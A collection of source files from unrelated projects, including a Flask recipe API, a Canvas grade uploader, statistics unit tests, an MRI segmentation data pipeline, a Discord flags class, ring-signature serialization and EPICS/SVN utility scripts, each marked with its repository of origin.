Recipe.name.ilike("%" + args['q'] + "%"),
Recipe.category_id == category.id
).paginate(page=args['page'], per_page=args['per_page'], error_out=False)
except KeyError:
recipes = current_user.recipes.filter(
Recipe.name.ilike("%" + args['q'] + "%"),
Recipe.category_id == category.id
).paginate(page=1, per_page=5)
else:
recipes = category.recipes.paginate(per_page=2)
base_url = request.base_url
if 'q' in args:
pagination_details = _pagination(recipes, base_url, q=args['q'])
else:
pagination_details = _pagination(recipes, base_url)
user_recipes = []
for current_recipe in recipes.items:
this_recipe = make_payload(recipe=current_recipe)
user_recipes.append(this_recipe)
if user_recipes:
response_payload = {
"recipes": user_recipes,
"page_details": pagination_details
}
return make_response(jsonify(response_payload), 200)
response_payload = {
"message": "Recipe does not exist."
}
return make_response(jsonify(response_payload), 400)
response_payload = dict(
message='Invalid category!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
@recipes_ns.route('/<int:recipe_id>')
class SingleRecipeHandler(Resource):
"""
This resource defines the single recipe handler endpoints
It contains the READ, UPDATE and DELETE functionality
"""
@authorization_required
def get(current_user, self, category_id, recipe_id):
"""
This returns a specific recipe from the specified category
:param int category_id: The integer Id of the category\n
:param int recipe_id: The integer Id of the recipe to be retrieved\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
# Return the recipe
response_payload = {
"recipes": [make_payload(recipe=selected_recipe)]
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@authorization_required
@API.expect(recipe)
def put(current_user, self, category_id, recipe_id):
"""
This returns a specific recipe from the specified category
:param int category_id: The integer Id of the category\n
:param int recipe_id: The integer Id of the recipe to be retrieved\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
# Get request data
request_payload = request.get_json()
new_recipe_name = _clean_name(request_payload['name'])
# Check if name provided is of an existing recipe
existing_recipe = current_user.recipes.filter(
Recipe.name == new_recipe_name,
Recipe.id != selected_recipe.id
).first()
if not existing_recipe:
if new_recipe_name != selected_recipe.name:
old_recipe_name = selected_recipe.name
# Update recipe
selected_recipe.name = new_recipe_name
selected_recipe.ingredients = request_payload['ingredients']
selected_recipe.description = request_payload['description']
db.session.commit()
# Return appropriate message saying the recipe was updated
response_payload = {
"message": "Recipe '{}' was successfully updated to '{}'.".format(
old_recipe_name, new_recipe_name
)
}
else:
selected_recipe.ingredients = request_payload['ingredients']
selected_recipe.description = request_payload['description']
db.session.commit()
# Return appropriate message saying the recipe was updated
response_payload = {
"message": "Recipe '{}' was successfully updated.".format(
selected_recipe.name
),
"recipe": make_payload(recipe=selected_recipe)
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@authorization_required
def delete(current_user, self, category_id, recipe_id):
"""
This returns a specific recipe from the specified category
:param int category_id: The integer Id of the category\n
:param int recipe_id: The integer Id of the recipe to be retrieved\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
name = selected_recipe.name
# Delete the selected recipe
db.session.delete(selected_recipe)
db.session.commit()
# Render response
response_payload = {
"message": "Recipe " + name + " was deleted successfully!"
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
```
#### File: yummy-rest/app/__init__.py
```python
import os
from flask import Flask, make_response, jsonify, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
# Linting exception
# pylint: disable=C0103
# pylint: disable=C0413
# local import
from instance.config import app_config
# initialize sql-alchemy
db = SQLAlchemy()
# Get the instance config to use
config_name = os.environ.get("APP_CONFIG", "production")
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object(app_config[config_name])
# overide 404 error handler
@APP.errorhandler(404)
def resource_not_found(error):
"""
This will be response returned if the user attempts to access
a non-existent resource or url.
"""
response_payload = dict(
message="The requested URL was not found on the server. " + \
"If you entered the URL manually please check your spelling and try again."
)
return make_response(jsonify(response_payload), 404)
@APP.route('/', methods=['GET'])
def redirect_to_docs():
"""
Redirects root to API docs
"""
return redirect('/api/v1/docs')
db.init_app(APP)
# Import and add namespaces for the endpoints
from app.restplus import API
from app.endpoints.auth import auth_ns
from app.endpoints.categories import categories_ns
from app.endpoints.recipes import recipes_ns
API.add_namespace(auth_ns)
API.add_namespace(categories_ns)
API.add_namespace(recipes_ns)
API.init_app(APP)
CORS(APP)
``` |
{
"source": "a2975667/canvas_grader",
"score": 2
} |
#### File: canvas_grader/src/grading.py
```python
import csv
import logging
from os.path import exists
from tqdm import tqdm
from src.canvas_wrapper import (fetch_student_id_mapping, get_all_submissions,
get_student_mapping, upload_grade_with_comment)
def grader_initialization(course, assignment_id):
logging.warning('Retrieving user information...')
users = course.get_users(enrollment_type=['student'])
logging.warning('Checking student metadata...')
if not exists('metadata/canvas.student.csv'):
logging.warning('No metadata found, creating one...')
fetch_student_id_mapping(users)
logging.warning('Retrieving all submissions...')
assignment = course.get_assignment(assignment_id)
submissions = get_all_submissions(users, course, assignment)
return submissions
def grade_upload(submissions, gradebook):
# create student - canvas ID mapping
logging.warning('Building student index...')
students, reversed_student = get_student_mapping(
filename='metadata/canvas.student.csv')
# read in grading data
logging.warning('Reading grade information...')
input_grade = {}
gb = csv.reader(open(gradebook))
next(gb, None)
for entry in gb:
if entry[0] not in students:
logging.warning(entry[0] + ' is not on canvas.')
continue
if entry[1].strip() == "":
logging.warning(entry[0] + ' does not have a (valid) score. Assuming 0.')
entry[1] = '0'
try:
input_grade[students[entry[0]]] = {
"netid": entry[0],
"grade": float(entry[1].strip()),
"comments": entry[2].strip().replace('$$$', ',')
}
except:
logging.critical('Something critical happened for ' +
entry[0] + ': the entry is: ' + str(entry))
# writing to canvas
logging.warning('Pushing updates to canvas...')
for _, submission in tqdm(submissions.items()):
canvas_id = str(submission.user_id)
if canvas_id in input_grade:
record = input_grade[canvas_id]
upload_grade_with_comment(
submission, record['grade'], record['comments'])
else:
logging.warning('Cannot find grade for: ' +
reversed_student[canvas_id])
upload_grade_with_comment(
submission, 0, ' cannot find submission.')
logging.warning('Done.')
``` |
{
"source": "a2975667/zoomAttendance",
"score": 3
} |
#### File: a2975667/zoomAttendance/helper.py
```python
def is_int(text: str):
try:
int(text)
except ValueError:
return False
return True
``` |
{
"source": "A2Amir/How-to-make-a-python-package-and-upload-it-to-pypi-",
"score": 3
} |
#### File: How-to-make-a-python-package-and-upload-it-to-pypi-/Package Unit Tests/test.py
```python
import unittest
from Gaussiandistribution import Gaussian
from Binomialdistribution import Binomial
class TestGaussianClass(unittest.TestCase):
def setUp(self):
self.gaussian = Gaussian(25, 2)
self.gaussian.read_data_file('numbers.txt')
def test_initialization(self):
self.assertEqual(self.gaussian.mean, 25, 'incorrect mean')
self.assertEqual(self.gaussian.stdev, 2, 'incorrect standard deviation')
def test_readdata(self):
self.assertEqual(self.gaussian.data,\
[1, 3, 99, 100, 120, 32, 330, 23, 76, 44, 31], 'data not read in correctly')
def test_meancalculation(self):
self.assertEqual(self.gaussian.calculate_mean(),\
sum(self.gaussian.data) / float(len(self.gaussian.data)), 'calculated mean not as expected')
def test_stdevcalculation(self):
self.assertEqual(round(self.gaussian.calculate_stdev(), 2), 92.87, 'sample standard deviation incorrect')
self.assertEqual(round(self.gaussian.calculate_stdev(0), 2), 88.55, 'population standard deviation incorrect')
def test_pdf(self):
self.assertEqual(round(self.gaussian.pdf(25), 5), 0.19947,\
'pdf function does not give expected result')
self.gaussian.calculate_mean()
self.gaussian.calculate_stdev()
self.assertEqual(round(self.gaussian.pdf(75), 5), 0.00429,\
'pdf function after calculating mean and stdev does not give expected result')
def test_add(self):
gaussian_one = Gaussian(25, 3)
gaussian_two = Gaussian(30, 4)
gaussian_sum = gaussian_one + gaussian_two
self.assertEqual(gaussian_sum.mean, 55)
self.assertEqual(gaussian_sum.stdev, 5)
class TestBinomialClass(unittest.TestCase):
def setUp(self):
self.binomial = Binomial(0.4, 20)
self.binomial.read_data_file('numbers_binomial.txt')
def test_initialization(self):
self.assertEqual(self.binomial.p, 0.4, 'p value incorrect')
self.assertEqual(self.binomial.n, 20, 'n value incorrect')
def test_readdata(self):
self.assertEqual(self.binomial.data,\
[0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0], 'data not read in correctly')
def test_calculatemean(self):
mean = self.binomial.calculate_mean()
self.assertEqual(mean, 8)
def test_calculatestdev(self):
stdev = self.binomial.calculate_stdev()
self.assertEqual(round(stdev,2), 2.19)
def test_replace_stats_with_data(self):
p, n = self.binomial.replace_stats_with_data()
self.assertEqual(round(p,3), .615)
self.assertEqual(n, 13)
def test_pdf(self):
self.assertEqual(round(self.binomial.pdf(5), 5), 0.07465)
self.assertEqual(round(self.binomial.pdf(3), 5), 0.01235)
self.binomial.replace_stats_with_data()
self.assertEqual(round(self.binomial.pdf(5), 5), 0.05439)
self.assertEqual(round(self.binomial.pdf(3), 5), 0.00472)
def test_add(self):
binomial_one = Binomial(.4, 20)
binomial_two = Binomial(.4, 60)
binomial_sum = binomial_one + binomial_two
self.assertEqual(binomial_sum.p, .4)
self.assertEqual(binomial_sum.n, 80)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "A2Amir/Prostate-Segmentation",
"score": 3
} |
#### File: A2Amir/Prostate-Segmentation/utils.py
```python
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import glob
import nibabel as nib
import nrrd
import tensorflow as tf
def get_imgs_labels_paths(PATH):
dataset_path = {}
imgs_path =[]
labls_path = []
number_images = []
for patient in os.listdir(PATH):
# to check if the patient folder name ends with a digit
if patient.split('/')[-1].isdigit():
for technic in os.listdir(os.path.join(PATH, patient)):
if technic in ['ADC','DWI', 'T2W']:
images_path = sorted(glob.glob(os.path.join(PATH, patient, technic)+'/*.nii'))
imgs_path.append(images_path)
number_images.append(len(images_path))
elif technic in ['label']:
labels_path = sorted(glob.glob(os.path.join(PATH, patient, technic)+'/*.nrrd'))
labls_path.append(labels_path)
else:
print('there is another folder named: ', PATH, patient, technic)
number_images.append(len(labels_path))
dataset_path[os.path.join(PATH, patient)] = [imgs_path, labels_path, number_images]
imgs_path =[]
labls_path =[]
number_images = []
return dataset_path
def read_label(img_path, resize_shape , num_classes):
readdata, header = nrrd.read(img_path)
label = cv2.resize( readdata, resize_shape)
label = label.astype(np.uint8)
label = tf.one_hot(tf.squeeze(label), depth= num_classes)
label = label.numpy().astype(np.uint8)
#print(img_path, 'label shape', label.shape)
return label
def read_image(path, resize_shape):
image = nib.load(path)
image = np.array(image.dataobj)
image = image.astype(float)
image = cv2.resize( image, resize_shape )
image = cv2.normalize(image, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)
#print(path, 'image shape', image.shape)
return image
def read_imgs_labels(dataset_paths, resize_shape, num_classes):
x_train = []
y_train = []
for k , i in dataset_paths.items():
#print(k)
#print()
image_paths = i[0]
label_path = i[1]
number_paths = i[2]
assert all([1 == num for num in number_paths])
for a, d, t, l in zip(image_paths[0], image_paths[1], image_paths[2],label_path ):
img_adc = read_image(a, resize_shape)
img_dwi = read_image(d, resize_shape)
img_t2w = read_image(t, resize_shape)
label_img = read_label(l, resize_shape , num_classes)
assert img_adc.shape == img_dwi.shape == img_t2w.shape == label_img.shape[:3]
for ch in range(img_adc.shape[2]):
x_train.append(np.stack([img_adc[:,:,ch],img_dwi[:,:,ch],img_t2w[:,:,ch]], axis=2))
y_train.append(label_img[:,:,ch,:])
#print('--------------------------------------------------------------')
x_train = np.stack((x_train))
y_train = np.stack((y_train))
return x_train, y_train
@tf.function()
def preparation(image, label , center_crop_rate=0.7, input_shape=(256, 256) ):
image = tf.image.central_crop(image, center_crop_rate)
label = tf.image.central_crop(label, center_crop_rate)
image = tf.image.resize(image, input_shape, method='bilinear')
label = tf.image.resize(label, input_shape, method='bilinear')
image = tf.cast(image, dtype= tf.float32)
label = tf.cast(label, dtype= tf.float32 )
return image, label
@tf.function()
def normalize(image, label):
# normalizing the images to [-1, 1]
image = tf.image.per_image_standardization(image)
#image = (image / 127.5) - 1
return image, label
@tf.function()
def random_augmentation(image, label):
if tf.random.uniform(()) > 0.5:
image = tf.image.rot90(image, k=1, name=None)
label = tf.image.rot90(label, k=1, name=None)
if tf.random.uniform(()) > 0.5:
image = tf.image.rot90(image, k=3, name=None)
label = tf.image.rot90(label, k=3, name=None)
if tf.random.uniform(()) > 0.5:
# random mirroring
image = tf.image.flip_left_right(image)
label = tf.image.flip_left_right(label)
return image, label
@tf.function()
def load_image_train(image_file, label_file, input_shape):
image, label= preparation(image_file, label_file, center_crop_rate=0.7, input_shape=input_shape)
image, label = random_augmentation(image, label)
image, label = normalize(image, label)
return image, label
@tf.function()
def load_image_test(image_file, label_file, input_shape):
image, label= preparation(image_file, label_file, center_crop_rate=0.7, input_shape=input_shape)
#image, label = random_augmentation(image, label)
image, label = normalize(image, label)
return image, label
def create_train_test_dataset(x_train, y_train, number_test_image, buffer_size, batch_size, input_shape):
x_test, y_test = x_train[:number_test_image,:,:,], y_train[:number_test_image,:,:,]
x_train, y_train = x_train[number_test_image:,:,:,], y_train[number_test_image:,:,:,]
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
train_dataset = train_dataset.map(lambda x, y: load_image_train(x, y, input_shape) , num_parallel_calls=tf.data.AUTOTUNE)
train_dataset = train_dataset.shuffle(buffer_size)
train_dataset = train_dataset.batch(batch_size)
test_dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))
test_dataset = test_dataset.map(lambda x, y: load_image_test(x, y, input_shape) , num_parallel_calls=tf.data.AUTOTUNE)
test_dataset = test_dataset.batch(batch_size)
return train_dataset, test_dataset
def show_img(img,label, n_classes):
img = img[0,:,:,:]
label = label[0,:,:,:]
plt.imshow(img)
fig, axs = plt.subplots(1,n_classes, figsize=(15, 6), facecolor='w', edgecolor='k')
axs = axs.ravel()
for i in range(n_classes):
axs[i].imshow(label[:,:,i])
axs[i].set_title('Ground T of Channel ' + str(i))
print('Unique numbers in channel {} are {},{}'.format(i, np.min(np.unique(label[:, :, i])),
np.max(np.unique(label[:, :, i]))))
plt.show()
``` |
{
"source": "a2br/Noodles",
"score": 3
} |
#### File: Noodles/utils/flags.py
```python
class flag_value:
def __init__(self, func):
self.flag = func(None)
self.__doc__ = func.__doc__
def __get__(self, instance, owner):
return instance._has_flag(self.flag)
class UserFlags:
def __init__(self, value: int = 0):
self.value = value
def __repr__(self):
return '<%s value=%s>' % (self.__class__.__name__, self.value)
def __iter__(self):
for name, value in self.__class__.__dict__.items():
if isinstance(value, flag_value) and self._has_flag(value.flag):
yield name
def _has_flag(self, o):
return (self.value & o) == o
@flag_value
def discord_employee(self):
return 1 << 0
@flag_value
def discord_partner(self):
return 1 << 1
@flag_value
def hs_events(self):
return 1 << 2
@flag_value
def bug_hunter_lvl1(self):
return 1 << 3
@flag_value
def mfa_sms(self):
return 1 << 4
@flag_value
def premium_promo_dismissed(self):
return 1 << 5
@flag_value
def hs_bravery(self):
return 1 << 6
@flag_value
def hs_brilliance(self):
return 1 << 7
@flag_value
def hs_balance(self):
return 1 << 8
@flag_value
def early_supporter(self):
return 1 << 9
@flag_value
def team_user(self):
return 1 << 10
@flag_value
def system(self):
return 1 << 12
@flag_value
def unread_sys_msg(self):
return 1 << 13
@flag_value
def bug_hunter_lvl2(self):
return 1 << 14
@flag_value
def underage_deleted(self):
return 1 << 15
@flag_value
def verified_bot(self):
return 1 << 16
@flag_value
def verified_dev(self):
return 1 << 17
``` |
{
"source": "a2br/pyring",
"score": 2
} |
#### File: pyring/pyring/serialize.py
```python
import base64
import string
import textwrap
import uuid
import pyasn1.codec.der.encoder
import pyasn1.codec.der.decoder
import pyasn1.codec.native.decoder
from pyasn1.type.namedtype import NamedType, NamedTypes
from pyasn1.type.univ import Sequence, SequenceOf, OctetString, ObjectIdentifier
from .ge import Point
from .sc25519 import Scalar
from .one_time import RingSignature
_PEM_OPENING = "-----BEGIN RING SIGNATURE-----"
_PEM_CLOSING = "-----END RING SIGNATURE-----"
_UUID = uuid.UUID(hex="3b5e61af-c4ec-496e-95e9-4b64bccdc809")
_OBJECT_ID = (2, 25) + tuple(_UUID.bytes)
class RingSignatureSchema(Sequence):
"""An ASN.1 schema for ring signatures.
Ring signatures are identified with an object ID following Recommendation
ITU-T X.667. The UUID4 used is 3b5e61af-c4ec-496e-95e9-4b64bccdc809.
"""
componentType = NamedTypes(
NamedType("algorithm", ObjectIdentifier(value=_OBJECT_ID)),
NamedType("key_image", OctetString()),
NamedType("public_keys", SequenceOf(componentType=OctetString())),
NamedType("c", SequenceOf(componentType=OctetString())),
NamedType("r", SequenceOf(componentType=OctetString())),
)
def export_pem(ring_signature: RingSignature) -> str:
"""Export the ring signature to a PEM file."""
der = pyasn1.codec.der.encoder.encode(
pyasn1.codec.native.decoder.decode(
{
"key_image": bytes(ring_signature.key_image.data),
"public_keys": [
bytes(public_key.data) for public_key in ring_signature.public_keys
],
"r": [bytes(r.data) for r in ring_signature.r],
"c": [bytes(c.data) for c in ring_signature.c],
},
asn1Spec=RingSignatureSchema(),
)
)
der_base64 = "\n".join(textwrap.wrap(base64.b64encode(der).decode("ascii"), 64))
return f"{_PEM_OPENING}\n{der_base64}\n{_PEM_CLOSING}"
def import_pem(signature: str) -> RingSignature:
signature = signature.strip()
if not signature.startswith(_PEM_OPENING) or not signature.endswith(_PEM_CLOSING):
raise ValueError("invalid encapsulation")
# Strip opening/closing and remove whitespace
signature = signature[len(_PEM_OPENING) : -len(_PEM_CLOSING)]
signature = signature.translate({ord(c): None for c in string.whitespace})
# Decode from text to ASN.1 object
der = base64.b64decode(signature, validate=True)
asn1, remainder = pyasn1.codec.der.decoder.decode(der)
if remainder:
raise ValueError("unable to decode entire signature")
# Check if the object identifier is correct
if asn1["field-0"] != _OBJECT_ID:
raise ValueError("invalid object ID")
# Extract data
key_image = Point(asn1["field-1"])
public_keys = [Point(public_key) for public_key in asn1["field-2"]]
cs = [Scalar(c) for c in asn1["field-3"]]
rs = [Scalar(r) for r in asn1["field-4"]]
return RingSignature(public_keys, key_image, cs, rs)
``` |
{
"source": "A2-Collaboration/epics",
"score": 2
} |
#### File: iocAdmin/src/iocReleaseCreateDb.py
```python
import sys
import os
import subprocess
import optparse
__all__ = ['export_db_file', 'module_versions', 'process_options']
def export_db_file(module_versions, path=None):
"""
Use the contents of a dictionary of module versions to create a database
of module release stringin PVs. The database
is written to stdout if path is not provided or is None.
"""
out_file = sys.stdout
idx = 0
idxMax = 20
if path:
try:
out_file = open(path, 'w')
except IOError, e:
sys.stderr.write('Could not open "%s": %s\n' % (path, e.strerror))
return None
sorted_module_versions = [(key, module_versions[key]) for key in sorted(module_versions.keys())]
print >> out_file, '#=============================================================================='
print >> out_file, '#'
print >> out_file, '# Abs: LCLS read-only stringin records for Modules specified in configure/RELEASE'
print >> out_file, '#'
print >> out_file, '# Name: iocRelease.db'
print >> out_file, '#'
print >> out_file, '# Note: generated automatically by $IOCADMIN/bin/$EPICS_HOST_ARCH/iocReleaseCreateDb.py'
print >> out_file, '#'
print >> out_file, '#=============================================================================='
for [key, module_version] in sorted_module_versions:
"""
strip off the _MODULE_VERSION from key for PV NAME
"""
x = key.replace("_MODULE_VERSION","",1)
if idx >= idxMax: break
print >> out_file, 'record(stringin, "$(IOC):RELEASE%02d") {' % idx
print >> out_file, ' field(DESC, "%s")' % x
print >> out_file, ' field(PINI, "YES")'
print >> out_file, ' field(VAL, "%s")' % module_version
print >> out_file, ' #field(ASG, "some read only grp")'
print >> out_file, '}'
idx = idx + 1
while idx < idxMax:
print >> out_file, 'record(stringin, "$(IOC):RELEASE%02d") {' % idx
print >> out_file, ' field(DESC, "Not Applicable")'
print >> out_file, ' field(PINI, "YES")'
print >> out_file, ' field(VAL, "Not Applicable")'
print >> out_file, ' #field(ASG, "some read only grp")'
print >> out_file, '}'
idx = idx + 1
if out_file != sys.stdout:
out_file.close()
def module_versions(release_path, site_path):
"""
Return a dictionary containing module names and versions.
"""
# first grab EPICS_BASE_VER from RELEASE_SITE file, if it's there
siteBaseVer = "Nada"
openSiteFile = 1
try:
site_file = open(site_path, 'r')
except IOError, e:
#sys.stderr.write('Could not open "%s": %s\n' % (site_path, e.strerror))
openSiteFile = 0
if openSiteFile:
for line in site_file:
# Remove comments
line = line.partition('#')[0]
# Turn 'a = b' into a key/value pair and remove leading and trailing whitespace
(key, sep, value) = line.partition('=')
key = key.strip()
value = value.strip()
# save EPICS_BASE_VER, if it's in there
if key.startswith('EPICS_BASE_VER'):
siteBaseVer = value
break
site_file.close()
# now get all the modules
try:
release_file = open(release_path, 'r')
except IOError, e:
sys.stderr.write('Could not open "%s": %s\n' % (release_path, e.strerror))
return None
release_file_dict = {}
for line in release_file:
# Remove comments
line = line.partition('#')[0]
# Turn 'a = b' into a key/value pair and remove leading and trailing whitespace
(key, sep, value) = line.partition('=')
key = key.strip()
value = value.strip()
# Add the key/value pair to the dictionary if the key ends with _MODULE_VERSION
if key.endswith('_MODULE_VERSION'):
# if BASE_MODULE_VERSION is set to EPICS_BASE_VER macro from RELEASE_SITE,
# capture it here
if key == "BASE_MODULE_VERSION" and value == "$(EPICS_BASE_VER)":
if siteBaseVer != "Nada":
release_file_dict[key] = siteBaseVer
else:
# don't set BASE at all
pass
else:
release_file_dict[key] = value
release_file.close()
return release_file_dict
def process_options(argv):
"""
Return parsed command-line options found in the list of
arguments, `argv`, or ``sys.argv[2:]`` if `argv` is `None`.
"""
if argv is None:
argv = sys.argv[1:]
# usage = 'Usage: %prog RELEASE_FILE [options]'
usage = 'Usage: %prog RELEASE_FILE RELEASE_SITE_FILE [options]'
version = '%prog 0.1'
parser = optparse.OptionParser(usage=usage, version=version)
parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='print verbose output')
parser.add_option("-e", "--db_file", action="store", type="string", dest="db_file", metavar="FILE", help="module database file path")
parser.set_defaults(verbose=False,
db_file=None)
(options, args) = parser.parse_args(argv)
if len(args) != 2:
parser.error("incorrect number of arguments")
options.release_file_path = os.path.normcase(args[0])
options.release_site_file_path = os.path.normcase(args[1])
return options
def main(argv=None):
options = process_options(argv)
versions = module_versions(options.release_file_path, options.release_site_file_path)
export_db_file(versions, options.db_file)
return 0
if __name__ == '__main__':
status = main()
sys.exit(status)
```
#### File: op/opi/convertMenu.py
```python
import sys
def main():
if len(sys.argv) < 2:
print "usage: convertMenu.py filename"
return
filename = sys.argv[1]
file = open(filename,"r+")
lines=file.readlines()
for i in range(len(lines)):
ix = lines[i].find("OPEN_DISPLAY")
if ix > 0:
print "found OPEN_DISPLAY:", lines[i]
found = False
for j in range(i, i+10):
ix = lines[j].find("<replace>false</replace>")
if ix > 0:
print "found <replace>false</replace>:", lines[j]
found = True
break
if found:
lines[i] = lines[i].replace("OPEN_DISPLAY", "OPEN_OPI_IN_VIEW")
lines[j] = lines[j].replace("<replace>false</replace>", "<Position>1</Position>")
i = j+1
file.seek(0)
file.writelines(lines)
if __name__ == "__main__":
main()
```
#### File: support/utils/logModuleFromTag.py
```python
usage = """
usage:
logModuleFromTag.py module [tag1 [tag2]]
If tag1 and tag2 are supplied:
do 'svn log -v' for 'module' from 'tag1' to 'tag2',
If tag2 is omitted:
use 'trunk' for tag2
If tag1 is omitted:
Use most recent tag for tag1
"""
import sys
import commands
SVN="https://subversion.xor.aps.anl.gov/synApps"
def tags(module, verbose=False):
"""
Return tags for a module in the synApps repository.
If verbose==False, return tags as a list; ['R1-0', 'R1-1']
else, return tags as a dictionary of dictionaries:
{'.': {'date': ('Mar', '30', '13:32'), 'rev': '10457', 'author': 'mooney'},
'R1-3': {'date': ('Mar', '30', '13:20'), 'rev': '10456', 'author': 'mooney'}}
"""
if verbose:
tagListRaw = commands.getoutput("svn ls -v %s/%s/tags" % (SVN,module)).split('\n')
tagDict = {}
for tag in tagListRaw:
(rev, author, month, day, year_time, tagName) = tag.split()
tagDict[tagName.strip('/')] = {'rev':rev, 'author':author, 'date':(month, day, year_time)}
return(tagDict)
else:
tagListRaw = commands.getoutput("svn ls %s/%s/tags" % (SVN,module)).split()
tagList = []
for tag in tagListRaw:
tagList.append(tag.strip('/'))
return(tagList)
def highestRevisionNum(module, dir):
maxRev = -1
maxTag = "None"
revDate = "None"
tagList = commands.getoutput("svn ls -v %s/%s/%s" % (SVN,module,dir)).split('\n')
#print "tagList:", tagList
for tag in tagList:
words = tag.split()
thisRev = int(words[0])
thisTag = words[5]
if (thisRev > maxRev) and (thisTag != "./"):
maxTag = words[5][:-1] # strip trailing slash
maxRev = thisRev
revDate = " ".join(words[2:5])
return (maxRev, maxTag, revDate)
def log(module, tag1=None, tag2=None):
# Find the difference between tag1 and tag2, or between tag1 and trunk
if tag2 == None:
if tag1 == None:
(tagRevNum, tag1, date1) = highestRevisionNum(module, 'tags')
print "Most recent tag (revision) is %s (%d) on %s" % (tag1, tagRevNum, date1)
else:
reply = commands.getoutput("svn ls -v %s/%s/%s" % (SVN,module,'tags/'+tag1))
tagList = reply.split('\n')
words = tagList[0].split()
try:
(tagRevNum, date1) = (int(words[0]), " ".join(words[2:5]))
except:
print "* * * Error: '%s', using most recent tag instead\n" % reply
(tagRevNum, tag1, date1) = highestRevisionNum(module, 'tags')
(trunkRevNum, xx, date2) = highestRevisionNum(module, 'trunk')
print "log from tag '%s' (%s on %s) to trunk (%s on %s)" % (tag1, tagRevNum, date1, trunkRevNum, date2)
if (tagRevNum > trunkRevNum):
l = "No changes"
else:
l = commands.getoutput("svn log -v -r %d:%d %s/%s" % (tagRevNum, trunkRevNum, SVN, module))
else:
(tag1RevNum, xx, date1) = highestRevisionNum(module, 'tags/'+tag1)
(tag2RevNum, xx, date2) = highestRevisionNum(module, 'tags/'+tag2)
print "log from tag '%s' (%s) to tag '%s' (%s)" % (tag1, date1, tag2, date2)
l = commands.getoutput("svn log -v -r %d:%d %s/%s" % (tag1RevNum, tag2RevNum, SVN, module))
l = l.split('\n')
return(l)
typeName = {'A': 'Added',
'C': 'Conflicted',
'D': 'Deleted',
'I': 'Ignored',
'M': 'Modified',
'R': 'Replaced',
'X': 'unversioned external',
'?': 'unknown',
'!': 'missing'}
def parseLog(lines, debug=False):
revisions = {}
currRev = None
section = None
for l in lines:
if debug>1: print("LINE='%s'" % l)
if len(l) == 0:
if debug>1: print('ignored')
if section == 'files': section = 'message'
continue
if l[0] == '-' and l.strip('-') == '':
if debug>1: print('separator')
currRev = None
section = None
continue
if currRev == None and l[0] == 'r':
currRev = l.split()[0]
if debug: print("revision:'%s'" % currRev)
revisions[currRev] = {'files':[], 'message':[]}
continue
if currRev and l == 'Changed paths:':
section = 'files'
if debug>1: print('ignored')
continue
if currRev and (section == 'files') and l[0].isspace():
(typeLetter,file) = l.lstrip(' ').split(' ', 1)
type = typeName[typeLetter]
if file.count(' '):
file = file.split(' ',1)[0]
if debug: print(" type ='%s', file = '%s'" % (type, file))
revisions[currRev]['files'].append([type, file])
continue
if currRev and (section == 'message'):
if debug: print(" commit message:'%s'" % l)
revisions[currRev]['message'].append(l)
return(revisions)
import os
def printRevisions(revs):
for key in revs.keys():
print(key)
for f in revs[key]['files']:
print("\t%s %s" % (f[0],os.path.basename(f[1])))
for m in revs[key]['message']:
print("\t%s" % m)
import sys
def printRevisionsHTML(revs,file=None):
if file == None:
fp = sys.stdout
else:
fp = open(file,'w')
fp.write("<html>\n")
fp.write("<body>\n")
fp.write('<dl>\n')
for key in revs.keys():
if (len(revs[key]['message'])) > 0 and (
revs[key]['message'][0][:39] == "This commit was manufactured by cvs2svn"):
continue
fp.write('\n<p><dt>')
for f in revs[key]['files']:
fp.write("%s %s<br>\n" % (f[0],os.path.basename(f[1])))
fp.write('<dd>')
for m in revs[key]['message']:
fp.write("<br>%s\n" % m)
fp.write('</dl>\n')
fp.write("</body>\n")
fp.write("</html>\n")
fp.close()
def main():
#print "sys.arvg:", sys.argv
if len(sys.argv) == 4:
s = log(sys.argv[1], sys.argv[2], sys.argv[3])
for line in s: print(line)
elif len(sys.argv) == 3:
s=log(sys.argv[1], sys.argv[2])
for line in s: print(line)
elif len(sys.argv) == 2:
s=log(sys.argv[1])
for line in s: print(line)
# elif len(sys.argv) == 2:
# s=tags(sys.argv[1])
# for line in s: print(line)
else:
print (usage)
return
if __name__ == "__main__":
main()
```
#### File: utils/snapDb/snapDb.py
```python
import sys
import dbd
import os
import wx
import wx.lib.mixins.listctrl as listmix
#import test_listctrl as listmix
HAVE_CA = True
try:
from ca_util import *
import ca
except:
HAVE_CA = False
databasePath = os.getcwd()
medmPath = os.getcwd()
displayInfo = {
'aSub': ('anyRecord.adl', 'P', 'R'),
'acalcout': ('yyArrayCalc.adl', 'P', 'C'),
'ai': ('anyRecord.adl', 'P', 'R'),
'ao': ('anyRecord.adl', 'P', 'R'),
'asyn': ('asynRecord.adl', 'P', 'R'),
'bi': ('anyRecord.adl', 'P', 'R'),
